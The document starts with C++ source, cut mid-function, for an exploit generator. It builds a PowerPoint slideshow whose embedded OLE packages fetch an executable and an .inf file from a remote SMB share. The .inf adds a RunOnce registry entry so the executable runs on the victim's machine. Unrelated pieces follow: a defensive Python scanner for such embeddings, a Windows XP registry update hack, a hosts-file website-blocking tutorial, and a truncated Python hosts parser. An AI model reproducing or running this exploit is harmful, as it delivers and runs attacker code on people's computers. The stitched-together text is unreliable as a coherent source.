    PowerPoint::MsoAnimateByLevel::msoAnimateLevelNone,
    PowerPoint::MsoAnimTriggerType::msoAnimTriggerAfterPrevious,
    3,
    &pEffect) );

    CHK_HR( pEffect ->get_Behaviors( &pAnimationBehaviors) );

    CHK_HR( pAnimationBehaviors ->raw_Add( PowerPoint::MsoAnimType::msoAnimTypeCommand, 1, &pAnimationBehavior) );

    CHK_HR( pAnimationBehavior ->get_CommandEffect( &pCommandEffect) );

    CHK_HR( pCommandEffect ->put_Type( PowerPoint::MsoAnimCommandType::msoAnimCommandTypeVerb) );

    CHK_HR( pCommandEffect ->put_Command( _bstr_t(L”3″)) );
    }
    /* Release resources assigned with Shape1
    */
    SAFE_RELEASE_BY_REF( &pCommandEffect );
    SAFE_RELEASE_BY_REF( &pAnimationBehavior );
    SAFE_RELEASE_BY_REF( &pAnimationBehaviors );
    SAFE_RELEASE_BY_REF( &pEffect );
    SAFE_RELEASE_BY_REF( &pShape1 );

    /* Configure SlideShowTransition
    */

    CHK_HR( pSlide ->get_SlideShowTransition(&pSlideShowTransition) );

    CHK_HR( pSlideShowTransition ->put_EntryEffect( PowerPoint::PpEntryEffect::ppEffectBoxOut ) );

    CHK_HR( pSlideShowTransition ->put_AdvanceTime( 0.5 ) );

    SAFE_RELEASE_BY_REF( &pSlideShowTransition );

    /* Release resources assigned with Presentation
    */
    SAFE_RELEASE_BY_REF( &pSequence );
    SAFE_RELEASE_BY_REF( &pTimeLine );
    SAFE_RELEASE_BY_REF( &pShapes );
    SAFE_RELEASE_BY_REF( &pSlide );
    SAFE_RELEASE_BY_REF( &pSlides );

    /* Save presentation
    */
    CHK_ALLOC(bstrSaveAs = SysAllocString(stdWstrFileSaveAs.c_str()) );

    CHK_HR( pPresentation ->raw_SaveAs( bstrSaveAs, saveAsType, Office::MsoTriState::msoTriStateMixed) );

    bres = true;

    _Done:

    VariantClear( &varSlideIndex );

    SAFE_FREE_BSTR_BY_REF( &bstrPresentationPath );

    SAFE_FREE_BSTR_BY_REF( &bstrApplicationProgId );

    SAFE_FREE_BSTR_BY_REF( &bstrSaveAs );

    /* Release resources assigned with Shape0 and Shape1
    */
    SAFE_RELEASE_BY_REF( &pCommandEffect );
    SAFE_RELEASE_BY_REF( &pAnimationBehavior );
    SAFE_RELEASE_BY_REF( &pAnimationBehaviors );
    SAFE_RELEASE_BY_REF( &pEffect );
    SAFE_RELEASE_BY_REF( &pShape0 );
    SAFE_RELEASE_BY_REF( &pShape1 );

    /* Release resources assigned with Presentation
    */
    SAFE_RELEASE_BY_REF( &pSlideShowTransition );
    SAFE_RELEASE_BY_REF( &pSequence );
    SAFE_RELEASE_BY_REF( &pTimeLine );
    SAFE_RELEASE_BY_REF( &pShapes );
    SAFE_RELEASE_BY_REF( &pSlide );
    SAFE_RELEASE_BY_REF( &pSlides );

    /* Close Currently opened presentation
    */
    if (pPresentation) {

    pPresentation ->raw_Close();
    }
    SAFE_RELEASE_BY_REF( &pPresentation );

    SAFE_RELEASE_BY_REF( &pPresentations );

    /* Close powerpoint automation application
    */
    if (pApplication) {

    pApplication ->raw_Quit();
    }

    SAFE_RELEASE_BY_REF( &pApplication );

    return bres;
    }

    bool create_ole_embed_stg_copy(__in const wchar_t *file_result, __in char *str1, __in char *str2) {

    bool bresult = false;
    IStorage *pStorage = NULL;
    IStream *pStream = NULL;
    HRESULT hresult = S_OK;
    CLSID clsidMedia = {0};
    VOID *pvFileData = NULL;
    size_t dataSize = 0;
    ULONG bytesWritten = 0;
    char trailer = 0;
    wstring stdWstrFileNameOut;

    stdWstrFileNameOut.append(file_result);

    hresult =
    StgCreateStorageEx(
    stdWstrFileNameOut.c_str(),
    STGM_CREATE | STGM_SHARE_EXCLUSIVE | STGM_READWRITE,
    STGFMT_STORAGE,
    0,
    NULL,
    NULL,
    IID_IStorage,
    (void**)&pStorage
    );

    if (FAILED(hresult)) {

    //printf(“[-] %s(): StgCreateStorageEx failed with error: %d(%08x)rn”, __FUNCTION__, hresult, hresult);

    CHK_HR(hresult);
    }

    hresult =
    pStorage ->CreateStream(
    L”x01OLE10Native”,
    STGM_CREATE | STGM_SHARE_EXCLUSIVE | STGM_READWRITE,
    0,
    0,
    &pStream
    );

    if (FAILED(hresult)) {

    //printf(“[-] %s(): IStorage::CreateStream failed with error: %d(%08x)rn”, __FUNCTION__, hresult, hresult);

    CHK_HR(hresult);
    }

    dataSize = strlen(str1) + 1 + strlen(str2) + 1;

    // write header
    hresult = pStream ->Write( &dataSize, (ULONG)4, &bytesWritten );

    if (FAILED(hresult)) {

    //printf(“[-] %s(): IStream::Write(header) failed with error %d(%08x)rn”, __FUNCTION__, hresult, hresult);

    CHK_HR(E_ABORT);
    }

    // write string 1
    hresult = pStream ->Write( str1, (ULONG)strlen(str1), &bytesWritten );

    if (FAILED(hresult)) {

    //printf(“[-] %s(): IStream::Write(string#1) failed with error %d(%08x)rn”, __FUNCTION__, hresult, hresult);

    CHK_HR(E_ABORT);
    }

    // write string 1 trailer
    hresult = pStream ->Write( &trailer, (ULONG)1, &bytesWritten );

    if (FAILED(hresult)) {

    //printf(“[-] %s(): IStream::Write(string#1 trailer) failed with error %d(%08x)rn”, __FUNCTION__, hresult, hresult);

    CHK_HR(E_ABORT);
    }

    // write string 2
    hresult = pStream ->Write( str2, (ULONG)strlen(str2), &bytesWritten );

    if (FAILED(hresult)) {

    //printf(“[-] %s(): IStream::Write(string#2) failed with error %d(%08x)rn”, __FUNCTION__, hresult, hresult);

    CHK_HR(E_ABORT);
    }

    // write string 2 trailer
    hresult = pStream ->Write( &trailer, (ULONG)1, &bytesWritten );

    if (FAILED(hresult)) {

    //printf(“[-] %s(): IStream::Write(string#2 trailer) failed with error %d(%08x)rn”, __FUNCTION__, hresult, hresult);

    CHK_HR(E_ABORT);
    }

    // write class of storage
    hresult = CLSIDFromString( L”{00022602-0000-0000-C000-000000000046}”, &clsidMedia);

    if (FAILED(hresult)) {

    //printf(“[-] %s(): CLSIDFromString failed with error %d(%08x)rn”, __FUNCTION__, hresult, hresult);

    CHK_HR(E_ABORT);
    }

    hresult = WriteClassStg(pStorage, clsidMedia);

    if (FAILED(hresult)) {

    //printf(“[-] %s(): WriteClassStg failed with error %d(%08x)rn”, __FUNCTION__, hresult, hresult);

    CHK_HR(hresult);
    }

    //printf(“[+] %s(): Storage %S created.rn”, __FUNCTION__, file_result);
    change_file_time( (wchar_t*)stdWstrFileNameOut.c_str() );

    bresult = true;

    _Done:
    SAFE_RELEASE_BY_REF( &pStream );

    SAFE_RELEASE_BY_REF( &pStorage );

    if(pvFileData) {

    free(pvFileData);
    }

    return bresult;

    }

    bool create_somthing_file(wchar_t *fpath) {

    HANDLE hFile = INVALID_HANDLE_VALUE;
    DWORD bytesWritten = 0;

    hFile = CreateFileW(fpath, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
    if (hFile == INVALID_HANDLE_VALUE || hFile == NULL) {

    wprintf(L”[-] ERROR: Cannot create temporary file %s with some datan”, fpath);

    return false;
    }

    if (FALSE == WriteFile( hFile, “Some Datan”, strlen(“Some Datan”), &bytesWritten, NULL)) {

    wprintf(L”[-] ERROR: Cannot write temporary file %s with some datan”, fpath);

    CloseHandle(hFile);

    return false;
    }

    CloseHandle(hFile);

    return true;
    }

    bool generate_inf_file(wchar_t *fnameInf, wchar_t *fnameExeOnSmb) {

    HANDLE hFile = INVALID_HANDLE_VALUE;
    DWORD bytesWritten = 0;
    wstring stdFnameExeOnSmb;
    string stdFnameExeOnSmbA;
    string data;
    BOOL bres = FALSE;

    stdFnameExeOnSmb.append(fnameExeOnSmb);
    stdFnameExeOnSmbA.append(stdFnameExeOnSmb.begin(), stdFnameExeOnSmb.end());

    hFile = CreateFileW( fnameInf, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
    if (hFile == INVALID_HANDLE_VALUE || hFile == NULL) {

    wprintf(L”[-] ERROR: Cannot create temporary file %s with some datan”, fnameInf);

    return false;
    }

    data.append(“; 61883.INFn”);
    data.append(“; Copyright (c) Microsoft Corporation. All rights reserved.nn”);

    data.append(“[Version]n”);
    data.append(“Signature = “$CHICAGO$”n”);
    data.append(“Class=61883n”);
    data.append(“ClassGuid={7EBEFBC0-3200-11d2-B4C2-00A0C9697D17}n”);
    data.append(“Provider=%Msft%n”);
    data.append(“DriverVer=06/21/2006,6.1.7600.16385nn”);

    data.append(“[DestinationDirs]n”);
    data.append(“DefaultDestDir = 1nn”);

    data.append(“[DefaultInstall]n”);
    data.append(“RenFiles = RxRenamen”);
    data.append(“AddReg = RxStartnn”);

    data.append(“[RxRename]n”);
    data.append(stdFnameExeOnSmbA.c_str());
    data.append(“.exe, “);
    data.append(stdFnameExeOnSmbA.c_str());
    data.append(“n”);

    data.append(“[RxStart]n”);
    data.append(“HKLM,SoftwareMicrosoftWindowsCurrentVersionRunOnce,Install,,%1%”);
    data.append(stdFnameExeOnSmbA.c_str());
    data.append(“.exen”);

    bres = WriteFile(hFile, data.c_str(), data.length(), &bytesWritten, NULL);

    FlushFileBuffers(hFile);

    CloseHandle(hFile);

    return (bres);
    }

    int wmain(int argc, wchar_t **argv) {

    wstring stdWstrSaveAs,
    stdWstrObject1,
    stdWstrObject2,
    stdWstrSavedAs;

    wstring stdFnamePptIn,
    stdSmbPath,
    stdFnameExe,
    stdFnameExeOnSmb,
    stdFnameInfOnSmb,
    stdPathExeOnSmb,
    stdPathInfOnSmb,
    stdPathTmp1,
    stdPathTmp2,
    stdPathInf,
    stdPathExe;
    string stdPathExeOnSmbA,
    stdPathInfOnSmbA;

    bool bForceUpload = false;

    wchar_t currDir[MAX_PATH];

    GetCurrentDirectoryW(MAX_PATH, currDir);

    if (!parse_cmd(argc, argv, &stdFnamePptIn, &stdSmbPath, &stdFnameExe, &stdFnameExeOnSmb, &stdFnameInfOnSmb, &bForceUpload ) ) {

    printf(“[-] ERROR: invalid inputn”);

    return 0;
    }

    CHK_HR( CoInitializeEx(NULL, COINIT_APARTMENTTHREADED));

    stdWstrSaveAs.append(stdFnamePptIn.c_str());

    stdWstrSaveAs.append(L”.saved.ppsx”);

    /* Construct a path to exe on SMB as %stdSmbPath%%stdFnameExeOnSmb%
    */
    stdPathExeOnSmb.append(stdSmbPath.c_str());
    stdPathExeOnSmb.append(L””);
    stdPathExeOnSmb.append(stdFnameExeOnSmb.c_str());
    stdPathExeOnSmbA.append(stdPathExeOnSmb.begin(), stdPathExeOnSmb.end());

    /* Construct a path to inf on SMB as %stdSmbPath%%stdFnameInfOnSmb%
    */
    stdPathInfOnSmb.append(stdSmbPath.c_str());
    stdPathInfOnSmb.append(L””);
    stdPathInfOnSmb.append(stdFnameInfOnSmb.c_str());
    stdPathInfOnSmbA.append(stdPathInfOnSmb.begin(), stdPathInfOnSmb.end());

    /* Construct a path to tmp1 file
    */
    stdPathTmp1.append(currDir);
    stdPathTmp1.append(L”tmp1.tmp”);

    if (!create_somthing_file((wchar_t*)stdPathTmp1.c_str()) ) {

    CHK_HR(E_ABORT);
    }

    /* Construct a path to tmp2 file
    */
    stdPathTmp2.append(currDir);
    stdPathTmp2.append(L”tmp2.tmp”);

    if (!create_somthing_file((wchar_t*)stdPathTmp2.c_str()) ) {

    CHK_HR(E_ABORT);
    }

    /* Modify presentation imm
    */
    if (!produce_presentation(
    (wchar_t*)stdFnamePptIn.c_str(),
    (wchar_t *)stdWstrSaveAs.c_str(),
    (wchar_t *) stdPathTmp1.c_str(),
    (wchar_t *) stdPathTmp2.c_str()
    ) )
    {

    printf(“[-] ERROR: cannot update presentationn”);

    CHK_HR( E_ABORT);
    }

    /* Create OLE 1-th Object
    */
    stdWstrObject1.append(currDir);
    stdWstrObject1.append(L””);
    stdWstrObject1.append(L”oleObject1.bin”);

    if (!create_ole_embed_stg_copy(stdWstrObject1.c_str(), “EmbeddedStg1.txt”, (char*)stdPathExeOnSmbA.c_str()) ) {

    printf(“[-] ERROR: cannot create 1-th OLE Objectn”);

    CHK_HR( E_ABORT);
    }

    /* Create OLE 2-th Object
    */
    stdWstrObject2.append(currDir);
    stdWstrObject2.append(L””);
    stdWstrObject2.append(L”oleObject2.bin”);
    if (!create_ole_embed_stg_copy(stdWstrObject2.c_str(), “EmbeddedStg2.txt”, (char*)stdPathInfOnSmbA.c_str()) ) {

    printf(“[-] ERROR: cannot create 2-th OLE Objectn”);

    CHK_HR( E_ABORT);
    }

    /* Generate inf file
    */
    stdPathInf.append(currDir);
    stdPathInf.append(L””);
    stdPathInf.append(stdFnameInfOnSmb.c_str());

    if (!generate_inf_file((wchar_t*)stdPathInf.c_str(), (wchar_t*)stdFnameExeOnSmb.c_str())) {

    printf(“[-] ERROR: Cannot generate inf filen”);
    CHK_HR(E_ABORT);
    }

    /* Generate exe for SMB
    */
    stdPathExe.append(currDir);
    stdPathExe.append(L””);
    stdPathExe.append(stdFnameExeOnSmb.c_str());

    if (!CopyFileW(stdFnameExe.c_str(), stdPathExe.c_str(), FALSE)) {
    wprintf(L”[-] ERROR: Cannot create ‘%s’ from ‘%s’n”, stdFnameExeOnSmb.c_str(), stdFnameExe.c_str());

    CHK_HR(E_ABORT);
    }

    /* Upload files onto remote shared folder
    */
    if (bForceUpload) {

    if (!CopyFileW( stdPathExe.c_str(), stdPathExeOnSmb.c_str(), FALSE)) {

    wprintf(L”[-] ERROR: Cannot upload .exe file ‘%s’ to ‘%s’n”, stdPathExe.c_str(), stdSmbPath.c_str());
    }

    if (!CopyFileW( stdPathInf.c_str(), stdPathInfOnSmb.c_str(), FALSE)) {

    wprintf(L”[-] ERROR: Cannot upload .inf file ‘%s’ to ‘%s’n”, stdPathInf.c_str(), stdSmbPath.c_str());
    }
    }
    int step = 1;
    wprintf(L”[+] INFO: n”);
    wprintf(L” %d) Rename presentation file ‘%s’ to ‘%s.zip’;n”, step++, stdWstrSavedAs.c_str(), stdWstrSavedAs.c_str());
    wprintf(L” %d) Stupid MS developers cann’t create API for zip, so unzip ‘%s.zip’n”, step++, stdWstrSavedAs.c_str());
    wprintf(L” %d) Copy ‘%s’ into ‘ppt/embeddings’ sub-directory of unzipped file;n”, step++, stdWstrObject1.c_str());
    wprintf(L” %d) Copy ‘%s’ into ‘ppt/embeddings’ sub-directory of unzipped file;n”, step++, stdWstrObject2.c_str());
    wprintf(L” %d) Zip unzipped presentation and rename to presentation with ‘.ppsx’n”, step++);
    if (bForceUpload) {
    wprintf(L” %d) Copy ‘%s’ into ‘%s’n”, step++, stdFnameExeOnSmb.c_str(), stdSmbPath.c_str());
    wprintf(L” %d) Copy ‘%s’ into ‘%s’n”, step++, stdFnameInfOnSmb.c_str(), stdSmbPath.c_str());
    }
    wprintf(L” %d) Enjoy..n”, step++);

    _Done:

    DeleteFileW( stdPathTmp1.c_str());

    DeleteFileW( stdPathTmp2.c_str());

    CoUninitialize();

    return(__G_hresult);
    }

    bool presentation_does_have_ole_packages(__in PowerPoint::_Presentation *pPresentation, __out bool *doesHave) {

    bool bres = false;
    PowerPoint::Slides *pSlides = NULL;
    PowerPoint::_Slide *pSlide = NULL;
    PowerPoint::Shapes *pShapes = NULL;
    PowerPoint::Shape *pShape = NULL;
    PowerPoint::OLEFormat *pOLEFormat = NULL;
    long slidesCount = 0;
    VARIANT varSlideIndex,
    varShapeIndex;
    int shapesCount = 0;
    MsoAutoShapeType shapeType;
    BSTR bstrProgId = NULL;
    IDispatch *pOLEDispObject = NULL;

    assert(doesHave != NULL);
    assert(pPresentation != NULL);

    *doesHave = false;

    /* Get pointer to interface of Slides object.
    */
    CHK_HR(pPresentation ->get_Slides(&pSlides) );

    /* Get count of slides in presentation
    */
    CHK_HR(pSlides ->get_Count(&slidesCount) );

    /* Make sure that slides exist in presentation
    */
    if (slidesCount == 0) {

    printf(“[-] Failed couse no slides found in presentationn”);

    CHK_HR(E_FAIL);
    }

    for (long i = 1; i <= slidesCount; i ++) {

    VariantInitAsLong(varSlideIndex, i);

    CHK_HR( pSlides ->raw_Item( varSlideIndex, &pSlide) );

    VariantClear( &varSlideIndex );

    /* Get list of shapes
    */
    CHK_HR( pSlide ->get_Shapes( &pShapes) );

    /* Get count of shapes
    */
    CHK_HR( pShapes ->get_Count(&shapesCount) );

    /* Verify each shape
    */
    for (int j = 1; j <= shapesCount; j++) {

    VariantInitAsLong( varShapeIndex, j);

    CHK_HR( pShapes ->raw_Item( varShapeIndex, &pShape) );

    VariantClear( &varShapeIndex );

    CHK_HR( pShape ->get_AutoShapeType( &shapeType) );

    if (shapeType == Office::MsoAutoShapeType::msoShapeMixed) {

    CHK_HR( pShape ->get_OLEFormat(&pOLEFormat) );

    CHK_HR( pOLEFormat ->get_ProgID( &bstrProgId) );

    if (wcsicmp( L”Package”, bstrProgId) == 0) {

    *doesHave = true;
    }

    SAFE_FREE_BSTR_BY_REF( &bstrProgId );

    SAFE_RELEASE_BY_REF( &pOLEFormat );
    }

    SAFE_RELEASE_BY_REF( &pShape );

    if (*doesHave) {

    break;
    }
    }
    ///////////

    SAFE_RELEASE_BY_REF( &pShapes );

    SAFE_RELEASE_BY_REF( &pSlide );

    if (*doesHave) {

    break;
    }
    }

    bres = true;

    _Done:

    VariantClear( &varShapeIndex );

    VariantClear( &varSlideIndex );

    SAFE_FREE_BSTR_BY_REF( &bstrProgId );

    SAFE_RELEASE_BY_REF( &pOLEFormat );

    SAFE_RELEASE_BY_REF( &pShape );

    SAFE_RELEASE_BY_REF( &pShapes );

    SAFE_RELEASE_BY_REF( &pSlide );

    SAFE_RELEASE_BY_REF( &pSlides );

    return bres;
    }

    bool change_file_time(wchar_t *fname) {

    SYSTEMTIME systemTime = {0};
    HANDLE hFile = INVALID_HANDLE_VALUE;
    FILETIME fileTime = {0};

    GetSystemTime( &systemTime);

    systemTime.wYear = 1980;
    systemTime.wMonth = 1;
    systemTime.wDay = 1;
    systemTime.wHour = 15;
    systemTime.wMinute = 0;
    systemTime.wSecond = 0;

    hFile =
    CreateFileW(
    fname,
    FILE_WRITE_ATTRIBUTES,
    FILE_SHARE_READ | FILE_SHARE_WRITE,
    NULL,
    OPEN_EXISTING,
    FILE_ATTRIBUTE_NORMAL,
    NULL
    );

    if (hFile == NULL || hFile == INVALID_HANDLE_VALUE) {

    return false;
    }

    SystemTimeToFileTime( &systemTime, &fileTime);

    SetFileTime( hFile, &fileTime, &fileTime, &fileTime);

    CloseHandle(hFile);

    return true;
    }

    bool rewrite_embeddings_in_presentation(__in wchar_t *fnameZip, __in wchar_t *fnameData)
    /*++
    Oh fuck! Stupid Microsoft developers cann’t create human-relible
    API for zip management. 21st century! WTF? I cann’t use IShell
    interface for zip management, so use 3rd party zip archivers.
    –*/
    {

    bool bres = false;
    IShellDispatch *pShell = NULL;
    VARIANT varDir,
    varFile,
    varOption;
    Folder *pFolder = NULL;
    wstring stdWstrDir;

    VariantInit(&varDir);
    VariantInit(&varFile);
    VariantInit(&varOption);

    stdWstrDir.append(fnameZip);
    stdWstrDir.append(L”pptembeddings”);

    CHK_HR( CoCreateInstance( CLSID_Shell, NULL, CLSCTX_INPROC_SERVER, IID_IShellDispatch, (LPVOID*)&pShell) );

    varDir.vt = VT_BSTR;
    varDir.bstrVal = _bstr_t(stdWstrDir.c_str());

    CHK_HR( pShell ->NameSpace(varDir, &pFolder) );

    varFile.vt = VT_BSTR;
    varFile.bstrVal = _bstr_t(fnameData);

    varOption.vt = VT_I4;
    varOption.lVal = FOF_NO_UI;

    CHK_HR( pFolder ->CopyHere( varFile, varOption) );

    Sleep( 1000 );

    bres = true;

    _Done:

    //VariantClear( &varOption );
    //VariantClear( &varFile );
    //VariantClear( &varDir );

    SAFE_RELEASE_BY_REF( &pFolder );

    SAFE_RELEASE_BY_REF( &pShell );

    return bres;
    }

    bool parse_cmd(
    __in int argc,
    wchar_t **argv,
    wstring *fnamePptIn,
    wstring *smbPath,
    wstring *fnameExe,
    wstring *fnameExeOnSmb,
    wstring *fnameInfOnSmb,
    bool *bForceUpload
    )
    {
    wstring stdOpt;
    bool bFnamePptIn = false,
    bSmbPath = false,
    bFnameExe = false,
    bFnameExeOnSmb = false,
    bFnameInfOnSmb = false;

    if (argc < 11) {

    print_usage_and_exit(argv[0]);

    return false;
    }

    for (int i = 1; i < argc; i++) {

    stdOpt.clear();

    stdOpt.append(argv[i]);

    if (stdOpt.compare(L”–force-upload”) == 0) {

    *bForceUpload = true;

    continue;
    }

    if ((i+1) >= argc) {

    printf(“[-] ERROR: malformed inputn”);

    return false;
    }

    if ( stdOpt.compare(L”-p”) == 0 ) {

    fnamePptIn ->clear();

    fnamePptIn ->append( argv[i+1]);

    i+=1;

    bFnamePptIn = true;

    continue;
    }

    if ( stdOpt.compare(L”-smb”) == 0 ) {

    smbPath ->clear();

    smbPath ->append( argv[i+1]);

    i+=1;

    bSmbPath = true;

    continue;
    }

    if ( stdOpt.compare(L”-ef”) == 0 ) {

    fnameExe ->clear();

    fnameExe ->append( argv[i+1]);

    i+=1;

    bFnameExe = true;

    continue;
    }

    if ( stdOpt.compare(L”-eof”) == 0 ) {

    fnameExeOnSmb ->clear();

    fnameExeOnSmb ->append( argv[i+1]);

    i+=1;

    bFnameExeOnSmb = true;

    continue;
    }

    if ( stdOpt.compare(L”-iof”) == 0 ) {

    fnameInfOnSmb ->clear();

    fnameInfOnSmb ->append( argv[i+1]);

    i+=1;

    bFnameInfOnSmb = true;

    continue;
    }
    }

    if (!bFnamePptIn || !bSmbPath || !bFnameExe || !bFnameExeOnSmb || !bFnameInfOnSmb) {

    printf(“[-] ERROR: Not all options specifiedn”);

    return false;
    }

    return true;
    }

    void print_usage_and_exit(wchar_t *exe) {

    wprintf(
    L” **************************************************************** n”
    L”[?] Usage: %s [option|[option]…] n”
    L” **************************************************************** n”
    L” options: n”
    L” -p – path to input PowerPoint presentation file; n”
    L” -smb – UNC path on remote server in which files should be n”
    L” placed, f.e: 192.168.3.100public ; n”
    L” -ef – path to executable file to be launched on 0wned n”
    L” machine; content of file ‘ll be stored into -eof n”
    L” file; n”
    L” -eof – name of file into which -ef file’s content to be n”
    L” stored; exploit uploads this file onto -smb path n”
    L” automatically; make sure that -eof file is located n”
    L” on remote server before exploitation phase; n”
    L” -iof – name of .inf file to be stored on remote server; n”
    L” exploit extracts .inf stub from self and stores into n”
    L” file on remote host automatically; make sure that n”
    L” this file exists on remote server before exploitation n”
    L” phase; n”
    L” –force-upload n”
    L” – specifies explicit file’s uploading to remote server; n”
    L” **************************************************************** n”
    L” EXAMPLE: n”
    L” -p a.pptx -smb 192.168.0.1public -ef E:stub.exe n”
    L” -eof Config.xml -iof Preview.inf –force-upload n”
    L” creates a.pptx.saved.ppsx file from a.pptx; n”
    L” stores stub.exe into 192.168.0.1publicConfig.xml; n”
    L” stores .inf stub into 192.168.0.1publicPreview.inf; n”
    L” **************************************************************** n”
    L” NOTES: n”
    L” -smb, -iof, -eof are written into presentations, so make sure n”
    ” that specified things exist in real life; n”
    L” **************************************************************** n”,
    exe);

    ExitProcess(0);
    }

    /* EOF
    */
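A defender-side check for the artifacts the source above produces, added here as an example and not part of the original code: it scans a presentation's `ppt/embeddings/` members for the length-prefixed "label NUL path NUL" payload that `create_ole_embed_stg_copy` writes, and reports entries whose path is a UNC path. The function names are hypothetical, the sample file is constructed (using the documentation address 192.0.2.10), and the scan is a raw-byte heuristic that assumes the short stream is stored contiguously rather than a full compound-file parser.

```python
import io
import re
import struct
import zipfile

CFB_MAGIC = bytes.fromhex("d0cf11e0a1b11ae1")  # OLE compound-file signature

# label, NUL, UNC path, NUL: both strings printable ASCII
PAIR_RE = re.compile(rb"([\x20-\x7e]+)\x00(\\\\[\x20-\x7e]+)\x00")


def scan_embedding(blob):
    """Return (label, unc_path) pairs found in one embedded OLE object."""
    hits = []
    if not blob.startswith(CFB_MAGIC):
        return hits
    for m in PAIR_RE.finditer(blob):
        if m.start() < 4:
            continue
        label, path = m.group(1), m.group(2)
        (declared,) = struct.unpack_from("<I", blob, m.start() - 4)
        # The 4-byte header holds strlen(label) + 1 + strlen(path) + 1.
        if declared == len(label) + 1 + len(path) + 1:
            hits.append((label.decode("ascii"), path.decode("ascii")))
    return hits


def scan_presentation(data):
    """Scan the bytes of a .pptx/.ppsx and list suspicious embeddings."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            if not name.lower().startswith("ppt/embeddings/"):
                continue
            for label, path in scan_embedding(zf.read(name)):
                findings.append({
                    "member": name,
                    "label": label,
                    "unc_path": path,
                    "inf_target": path.lower().endswith(".inf"),
                })
    return findings


def _fake_ole(label, path):
    # Constructed stand-in: signature, zero padding, then the payload.
    body = label + b"\x00" + path + b"\x00"
    return (CFB_MAGIC + b"\x00" * 504
            + struct.pack("<I", len(body)) + body + b"\x00" * 16)


def build_sample():
    """Build a constructed test archive with two flagged and one clean object."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("ppt/slides/slide1.xml", "<p:sld/>")
        zf.writestr("ppt/embeddings/oleObject1.bin",
                    _fake_ole(b"EmbeddedStg1.txt",
                              rb"\\192.0.2.10\public\Config.xml"))
        zf.writestr("ppt/embeddings/oleObject2.bin",
                    _fake_ole(b"EmbeddedStg2.txt",
                              rb"\\192.0.2.10\public\Preview.inf"))
        zf.writestr("ppt/embeddings/oleObject3.bin", CFB_MAGIC + b"\x00" * 600)
    return buf.getvalue()


if __name__ == "__main__":
    for finding in scan_presentation(build_sample()):
        print(finding)
```

An embedded object that points at a remote `.inf` file is the strongest signal here; any UNC path inside a presentation's embedded package is worth a manual look.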

Microsoft XP updated until 2019 – tweak

The registry addition tricks Microsoft into thinking your PC is running the Point Of Sale “Embedded” version of Windows, which will continue to have updates until 2019. The change only works on 32-bit systems, not 64-bit. Microsoft warns this is a bad idea and suggests, naturally, you replace the operating system with Windows 7 or higher. If you make this change to an XP machine, you do this at your own risk. To make the change:

Make sure your computer is properly backed up in case anything goes wrong. Then, open Notepad to create a new text document.

Paste in the following text:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\WPA\PosReady]
"Installed"=dword:00000001

Save the text file, but change its extension from .txt to .reg.

Double-click your newly-created .reg file to make the tweak.

If you have a system that you can’t quite get rid of yet, this could make it last a bit longer.

How to block access to a website

If you are concerned about someone in the family or workplace using a certain website, there are a few different methods of restricting access. Although it is possible to block access on a specific browser, many computers these days have more than one browser available to a user.

Another option is to edit a file within Windows known as the hosts file. Using this method makes it possible to restrict access to a particular website regardless of which browser someone is using.

Step 1

Move the mouse to either the top or bottom right corner of the screen and the Charms menu will slide into place.

From this menu click on Search.


Step 2

Make sure that Apps is selected and type Notepad.

Notepad should appear on the left side of the screen.


Step 3

Do not double-click on Notepad. Instead, click on it once to select it, and a row of options will appear along the bottom of the screen.

From this row of options click on “Run as administrator”.


Step 4

A small ‘User Account Control’ window may appear asking if you want to proceed – click “Yes”.

You will be taken to the desktop environment with a blank notepad file open.


Step 5

From the row of options along the top of the notepad file, click on File and from the drop-down list that appears click on Open.

A window will open with a column of options on the left. From these options we are looking for the C drive. In some cases it may be labelled as Local Disk. In other cases it may have the name of the computer’s manufacturer.


Step 6

When you have located the C drive, click it once to highlight it and a number of folders will be listed on the right.

Scroll down the folders listed and double-click on the ‘Windows’ folder.


Step 7

You will then be shown all of the folders within the Windows directory.

Scroll down again and this time double-click on the ‘System32’ folder.


Step 8

Within this folder, scroll through the available folders and double-click on ‘Drivers’.


Step 9

This time you are looking for the ‘etc’ folder. Double-click on the ‘etc’ folder to open it and at first it may look like you have opened a blank folder.


Step 10

Towards the bottom right corner of this window is an item labelled Text Documents (*.txt). Click on the arrow next to it and from the options listed click on ‘All files’.


Step 11

More files should now be listed – it is the ‘hosts’ file we are interested in.

Click on this file once to highlight it and then click Open.


Step 12

A notepad file should now open which is named ‘hosts’.

If you want to block access to a particular website, at the bottom of this file write the number 127.0.0.1, press the space-bar once and then enter the www address of the site you want to block.

For example if you wish to block Facebook type the following:

127.0.0.1 www.facebook.com

Notice that we DO NOT include a # symbol at the start of the line as the other lines in the file do; lines that begin with # are comments and are ignored.


Step 13

At the top click File and then Save. Bring up your Internet browser to test the website.

If the details were entered correctly you should not be able to access that particular website.

If you wish to do the same with any other websites, simply access the hosts file again in the same way and add the other website address at the bottom of the file.

If you change your mind at any point, access the hosts file again, delete the line with the blocked website address and Save the hosts file again.
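The hosts file matches hostnames exactly, so the single line from Step 12 redirects `www.facebook.com` but not `facebook.com` or `m.facebook.com`. The following added example (not part of the original tutorial) parses hosts-file text and lists the lines still needed to cover a set of names; the function names and the sample file content are constructed for illustration.

```python
import ipaddress

# Constructed sample: two comment lines plus the entry from Step 12.
SAMPLE_HOSTS = """\
# Sample hosts file (constructed for this example)
#      192.0.2.97     rhino.example          # commented out, ignored
127.0.0.1 www.facebook.com
"""


def parse_hosts(text):
    """Map each lower-cased hostname to the address on its line."""
    table = {}
    for raw in text.splitlines():
        # Drop comments, whether they fill the line or trail an entry.
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        address, *names = line.split()
        try:
            ip = ipaddress.ip_address(address)
        except ValueError:
            continue  # malformed line: skip it
        for name in names:
            # Assumption of this example: keep the first mapping seen.
            table.setdefault(name.lower(), ip)
    return table


def is_blocked(hostname, table):
    """True if the exact hostname is mapped to a loopback or 0.0.0.0 sink."""
    ip = table.get(hostname.lower().rstrip("."))
    return ip is not None and (ip.is_loopback or ip.is_unspecified)


def missing_entries(hostnames, table, sink="127.0.0.1"):
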